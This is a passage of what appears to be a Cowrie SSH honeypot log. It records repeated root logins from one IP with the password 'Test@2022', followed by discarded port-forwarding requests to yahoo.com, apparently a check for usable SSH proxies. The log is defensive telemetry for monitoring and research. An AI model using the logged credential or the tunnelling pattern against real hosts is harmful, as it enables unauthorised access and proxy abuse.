{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.385948Z","src_ip":"213.209.150.239","session":"981dd2bcb75e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.442515Z","src_ip":"213.209.150.239","session":"981dd2bcb75e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.725323Z","src_ip":"213.209.150.239","session":"981dd2bcb75e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":13037,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:13037","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.782920Z","session":"981dd2bcb75e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.839779Z","src_ip":"213.209.150.239","session":"981dd2bcb75e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":20283,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:20283","sensor":"my-vps","timestamp":"2025-08-26T01:01:15.995260Z","session":"981dd2bcb75e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.051998Z","src_ip":"213.209.150.239","session":"981dd2bcb75e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.110234Z","src_ip":"213.209.150.239","session":"981dd2bcb75e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17576,"dst_ip":"1.2.3.4","dst_port":22,"session":"d777d6335ee3","protocol":"ssh","message":"New connection: 213.209.150.239:17576 (1.2.3.4:22) [session: d777d6335ee3]","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.165982Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.166622Z","src_ip":"213.209.150.239","session":"d777d6335ee3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.223789Z","src_ip":"213.209.150.239","session":"d777d6335ee3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.506486Z","src_ip":"213.209.150.239","session":"d777d6335ee3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":28956,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:28956","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.564256Z","session":"d777d6335ee3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.621141Z","src_ip":"213.209.150.239","session":"d777d6335ee3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":2720,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:2720","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.779129Z","session":"d777d6335ee3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.835945Z","src_ip":"213.209.150.239","session":"d777d6335ee3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.893593Z","src_ip":"213.209.150.239","session":"d777d6335ee3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17629,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f8d0d9246bc","protocol":"ssh","message":"New connection: 213.209.150.239:17629 (1.2.3.4:22) [session: 1f8d0d9246bc]","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.939543Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.940568Z","src_ip":"213.209.150.239","session":"1f8d0d9246bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:16.988067Z","src_ip":"213.209.150.239","session":"1f8d0d9246bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.223319Z","src_ip":"213.209.150.239","session":"1f8d0d9246bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":11861,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:11861","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.272522Z","session":"1f8d0d9246bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.319774Z","src_ip":"213.209.150.239","session":"1f8d0d9246bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":13004,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:13004","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.457402Z","session":"1f8d0d9246bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.504580Z","src_ip":"213.209.150.239","session":"1f8d0d9246bc"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.552554Z","src_ip":"213.209.150.239","session":"1f8d0d9246bc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17679,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0d9ddf4c410","protocol":"ssh","message":"New connection: 213.209.150.239:17679 (1.2.3.4:22) [session: e0d9ddf4c410]","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.608164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.608831Z","src_ip":"213.209.150.239","session":"e0d9ddf4c410"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.665517Z","src_ip":"213.209.150.239","session":"e0d9ddf4c410"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:17.947573Z","src_ip":"213.209.150.239","session":"e0d9ddf4c410"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":28497,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:28497","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.005684Z","session":"e0d9ddf4c410"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.062499Z","src_ip":"213.209.150.239","session":"e0d9ddf4c410"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":17239,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:17239","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.219139Z","session":"e0d9ddf4c410"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.276124Z","src_ip":"213.209.150.239","session":"e0d9ddf4c410"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.334430Z","src_ip":"213.209.150.239","session":"e0d9ddf4c410"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17742,"dst_ip":"1.2.3.4","dst_port":22,"session":"eb0051435c70","protocol":"ssh","message":"New connection: 213.209.150.239:17742 (1.2.3.4:22) [session: eb0051435c70]","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.380226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.381244Z","src_ip":"213.209.150.239","session":"eb0051435c70"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.428576Z","src_ip":"213.209.150.239","session":"eb0051435c70"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.663736Z","src_ip":"213.209.150.239","session":"eb0051435c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":26222,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:26222","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.712044Z","session":"eb0051435c70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.759387Z","src_ip":"213.209.150.239","session":"eb0051435c70"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":11454,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:11454","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.897702Z","session":"eb0051435c70"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.945323Z","src_ip":"213.209.150.239","session":"eb0051435c70"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:01:18.994478Z","src_ip":"213.209.150.239","session":"eb0051435c70"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":17793,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f327b2fdd66","protocol":"ssh","message":"New connection: 213.209.150.239:17793 (1.2.3.4:22) [session: 0f327b2fdd66]","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.040308Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:01:19.041249Z","src_ip":"213.209.150.239","session":"0f327b2fdd66"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac